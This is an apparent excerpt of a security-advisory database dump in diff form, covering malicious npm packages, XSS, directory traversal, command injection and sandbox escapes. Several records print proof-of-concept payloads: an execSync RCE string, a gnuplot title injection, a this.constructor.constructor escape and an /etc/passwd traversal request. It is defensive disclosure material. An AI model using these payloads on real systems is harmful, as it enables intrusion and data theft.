+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffer-por'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1243'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:06Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hv4w-jhcj-6wfw,2020-08-31T18:49:43Z,2020-09-03T20:34:23Z,,[],Cross-Site Scripting in snekserve,"All versions of `snekserve` are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize filenames, allowing attackers to execute arbitrary JavaScript in the victim's browser through files with names containing malicious code.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'snekserve'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1167'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:49:43Z', 'nvd_published_at': None}"
+1.4.0,GHSA-97mg-3cr6-3x4c,2020-08-31T18:59:39Z,2020-09-04T17:27:23Z,,[],Remote Code Execution in mongodb-query-parser,"Versions of `mongodb-query-parser` prior to 2.0.0 are vulnerable to Remote Code Execution. The package fails to sanitize queries, allowing attackers to execute arbitrary code in the system. Parsing the following payload executes `touch test-file`:
+
+```'(function () { return (clearImmediate.constructor(""return process;"")()).mainModule.require(""child_process"").execSync(""touch test-file"").toString()})()'```
+
+
+
+## Recommendation
+
+Upgrade to version 2.0.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'mongodb-query-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1448'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:59:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7xfq-xh6v-4mrm,2021-10-01T13:10:41Z,2020-09-01T20:27:53Z,,[],Malicious Package in json-serializer,"Version 2.0.10 of `json-serializer` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 2.0.10 of this module is found installed you will want to replace it with a version before or after 2.0.10. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'json-serializer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.10'}, {'fixed': '2.0.11'}]}], 'versions': ['2.0.10']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/630'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:33Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m852-866j-69j8,2021-10-01T13:27:58Z,2020-09-01T20:47:01Z,,[],Malicious Package in eslint-config-airbnb-standard,"Version 2.0.0 of `eslint-config-airbnb-standard` was published with a bundled version of `eslint-scope` that was found to contain malicious code. This code would read the users `.npmrc` file and send it's contents to a remote server.
+
+
+## Recommendation
+
+The best course of action if you found this package installed in your environment is to revoke all your npm tokens and use a different version of the module. You can find instructions on how to do that here. https://docs.npmjs.com/getting-started/working_with_tokens#how-to-revoke-tokens
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'eslint-config-airbnb-standard'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.0'}]}], 'versions': ['2.0.0']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/675'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:32:19Z', 'nvd_published_at': None}"
+1.4.0,GHSA-766v-7gjx-55hf,2021-09-30T17:14:27Z,2020-09-03T23:08:34Z,,[],Malicious Package in js-shq3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'js-shq3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1289'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:56Z', 'nvd_published_at': None}"
+1.4.0,GHSA-r9cj-xj33-4q42,2021-09-29T21:26:56Z,2020-09-03T22:21:54Z,,[],Malicious Package in buffgr-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffgr-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1260'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:49Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vwcg-7xqw-qcxw,2020-09-18T14:06:03Z,2020-09-18T18:03:59Z,,['CVE-2020-25489'],Heap Overflow in PyMiniRacer,"A heap overflow in Sqreen PyMiniRacer (aka Python Mini Racer) before 0.3.0 allows remote attackers to potentially exploit heap corruption.
+
+More details on https://blog.sqreen.com/vulnerability-disclosure-finding-a-vulnerability-in-sqreens-php-agent-and-how-we-fixed-it/.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'py-mini-racer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sqreen/PyMiniRacer/security/advisories/GHSA-vwcg-7xqw-qcxw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25489'}, {'type': 'WEB', 'url': 'https://github.com/sqreen/PyMiniRacer/commit/627b54768293ec277f1adb997c888ec524f4174d'}, {'type': 'WEB', 'url': 'https://blog.sqreen.com/vulnerability-disclosure-finding-a-vulnerability-in-sqreens-php-agent-and-how-we-fixed-it/'}, {'type': 'WEB', 'url': 'https://github.com/sqreen/PyMiniRacer/compare/v0.2.0...v0.3.0'}]","{'cwe_ids': ['CWE-119'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-18T14:06:03Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5x7p-gm79-383m,2021-10-01T13:28:51Z,2020-09-01T21:11:57Z,,[],Malicious Package in regenraotr,"All versions of `regenraotr` are considered malicious. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When executed, the package calls home to a Command and Control server to execute arbitrary commands.
+
+
+## Recommendation
+
+This package was published to the npm Registry for a very short period of time. If you happen to find it in your environment you should revoke and rotate all credentials found on the compromised machine, as well as completely erase the affected machine and reinstall your Operating System.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'regenraotr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/684'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:32:40Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xpqw-fqpw-35fc,2023-09-07T00:11:01Z,2020-09-01T16:57:54Z,,['CVE-2017-16150'],Directory Traversal in wangguojing123,"Affected versions of `wangguojing123` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.",[],"[{'package': {'ecosystem': 'npm', 'name': 'wangguojing123'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16150'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/wangguojing123'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/374'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:20:50Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vcg5-9xw6-r56c,2021-09-30T21:55:54Z,2020-09-02T21:40:49Z,,[],Malicious Package in logsymbles,"Version 2.2.0 of `logsymbles` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opens a backdoor.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'logsymbles'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/908'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:09Z', 'nvd_published_at': None}"
+1.4.0,GHSA-54cr-gv8w-8324,2023-07-27T20:32:35Z,2020-09-01T20:36:22Z,,[],Malicious Package in xoc,"Version 1.0.7 of `xoc` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 1.0.7 of this module is found installed you will want to replace it with a version before or after 1.0.7. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 1.0.5",[],"[{'package': {'ecosystem': 'npm', 'name': 'xoc'}, 'versions': ['1.0.7']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/638'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:51Z', 'nvd_published_at': None}"
+1.4.0,GHSA-788m-pj96-7w2c,2021-09-27T21:41:40Z,2020-09-02T21:23:51Z,,[],Cross-Site Scripting in fomantic-ui,"Versions of `fomantic-ui` are vulnerable to Cross-Site Scripting. Lack of output encoding on the selection dropdowns can lead to user input being executed instead of printed as text.
+
+
+## Recommendation
+
+Upgrade to version 2.7.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'fomantic-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.0'}]}]}]","[{'type': 'PACKAGE', 'url': 'https://github.com/fomantic/Fomantic-UI'}, {'type': 'WEB', 'url': 'https://github.com/fomantic/Fomantic-UI/releases/tag/2.7.0'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/885'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:39:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8fw4-xh83-3j6q,2021-09-28T16:58:42Z,2020-09-11T21:18:05Z,,[],Cross-Site Scripting in diagram-js,"Versions of `diagram-js` prior to 3.3.1 (for 3.x) and 2.6.2 (for 2.x) are vulnerable to Cross-Site Scripting. The package fails to escape output of user-controlled input in `search-pad`, allowing attackers to execute arbitrary JavaScript.
+
+
+## Recommendation
+
+If you are using diagram-js 3.x, upgrade to version 3.3.1.
+If you are using diagram-js 2.x, upgrade to version 2.6.2.",[],"[{'package': {'ecosystem': 'npm', 'name': 'diagram-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'diagram-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.3.1'}]}]}]","[{'type': 'PACKAGE', 'url': 'https://github.com/bpmn-io/diagram-js'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/982'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:42:58Z', 'nvd_published_at': None}"
+1.4.0,GHSA-39cx-xcwj-3rc4,2023-09-27T13:39:18Z,2020-09-01T15:25:29Z,,['CVE-2008-6681'],Cross-Site Scripting in dojo,"Affected versions of `dojo` are susceptible to a cross-site scripting vulnerability in the `dijit.Editor` and `textarea` components, which execute their contents as Javascript, even when sanitized.
+
+
+## Recommendation
+
+Update to version 1.1.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'dojo'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2008-6681'}, {'type': 'WEB', 'url': 'https://bugs.dojotoolkit.org/ticket/2140'}, {'type': 'WEB', 'url': 'https://exchange.xforce.ibmcloud.com/vulnerabilities/49883'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/107'}, {'type': 'WEB', 'url': 'http://trac.dojotoolkit.org/changeset/15346'}, {'type': 'WEB', 'url': 'http://trac.dojotoolkit.org/ticket/2140'}, {'type': 'WEB', 'url': 'http://www.dojotoolkit.org/book/dojo-1-1-release-notes'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/34661'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:11:03Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w3cg-6577-wx9f,2023-09-11T20:33:24Z,2020-09-01T17:20:41Z,,['CVE-2017-16122'],Directory Traversal in cuciuci,"Affected versions of `cuciuci` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'cuciuci'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16122'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/cuciuci'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/381'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:21:07Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4g9f-63rx-5cw4,2021-08-26T15:09:19Z,2020-09-25T18:28:14Z,,['CVE-2020-15190'],Segfault in Tensorflow,"### Impact
+The [`tf.raw_ops.Switch`](https://www.tensorflow.org/api_docs/python/tf/raw_ops/Switch) operation takes as input a tensor and a boolean and outputs two tensors. Depending on the boolean value, one of the tensors is exactly the input tensor whereas the other one should be an empty tensor.
+
+However, the eager runtime traverses all tensors in the output:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/common_runtime/eager/kernel_and_device.cc#L308-L313
+
+Since only one of the tensors is defined, the other one is `nullptr`, hence we are binding a reference to `nullptr`. This is undefined behavior and reported as an error if compiling with `-fsanitize=null`. In this case, this results in a segmentation fault
+
+### Patches
+We have patched the issue in da8558533d925694483d2c136a9220d6d49d843c and will release a patch release for all affected versions.
+
+We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4g9f-63rx-5cw4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15190'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/da8558533d925694483d2c136a9220d6d49d843c'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00065.html'}]","{'cwe_ids': ['CWE-20', 'CWE-476'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T16:14:42Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-qfc9-x7gv-27jr,2021-09-30T20:03:51Z,2020-09-03T18:12:36Z,,[],Malicious Package in deasyncp,"All versions of `deasyncp ` contain malicious code. The package shuts down the machine upon installation as a preinstall script.
+
+
+## Recommendation
+
+Remove the package from your environment. There is no further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'deasyncp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1073'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7696-qr5q-pg37,2021-10-01T16:10:59Z,2020-09-03T23:19:08Z,,[],Malicious Package in zs-sha3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'zs-sha3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1299'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:19Z', 'nvd_published_at': None}"
+1.4.0,GHSA-65xx-c85x-wg76,2020-08-31T18:59:26Z,2020-09-04T17:20:52Z,,[],Command Injection in plotter,"All versions of `plotter` are vulnerable to Command Injection. The package fails to sanitize plot titles, which may allow attackers to execute arbitrary code in the system if the title value is supplied by a user. The following proof-of-concept creates a `testing` file in the current directory:
+
+```
+var plot = require('plotter').plot;
+
+const title = 'Example ""\nset title system(""touch testing"")#';
+
+plot({
+data: [ 3, 1, 2, 3, 4 ],
+filename: 'output.pdf',
+style: 'linespoints',
+title: title,
+logscale: true,
+xlabel: 'time',
+ylabel: 'length of string',
+format: 'pdf'
+});
+
+```
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'plotter'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1441'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:59:26Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vv7g-pjw9-4qj9,2021-10-04T15:24:14Z,2020-09-03T17:03:56Z,,[],Malicious Package in scrytsy,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'scrytsy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1408'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:58:14Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jfx5-7mr2-g8hg,2021-09-30T18:35:26Z,2020-09-03T17:31:41Z,,[],Malicious Package in alico,"All versions of `alico` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'alico'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1047'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:22Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mp55-2274-4pj8,2021-09-29T21:03:38Z,2020-09-03T21:54:09Z,,[],Malicious Package in buffer-xgr,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffer-xgr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1244'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:08Z', 'nvd_published_at': None}"
+1.4.0,GHSA-353r-3v84-9pjj,2021-10-01T13:25:56Z,2020-09-01T20:40:36Z,,[],Malicious Package in nothing-js,"`nothing-js` contained a malicious script that attempted to delete all files when `npm test` was run.
+
+
+## Recommendation
+
+This module has been unpublished from the npm Registry. If you find this module in your environment remove it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'nothing-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/650'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:31:19Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gc25-3vc5-2jf9,2020-08-31T18:54:57Z,2020-09-04T15:00:58Z,,[],Sandbox Breakout / Arbitrary Code Execution in sandbox,"All versions of `sandbox` are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through `this.constructor.constructor` . This may allow attackers to execute arbitrary code in the system. Evaluating the payload `this.constructor.constructor('return process.env')()` prints the contents of `process.env`.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'sandbox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1318'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:57Z', 'nvd_published_at': None}"
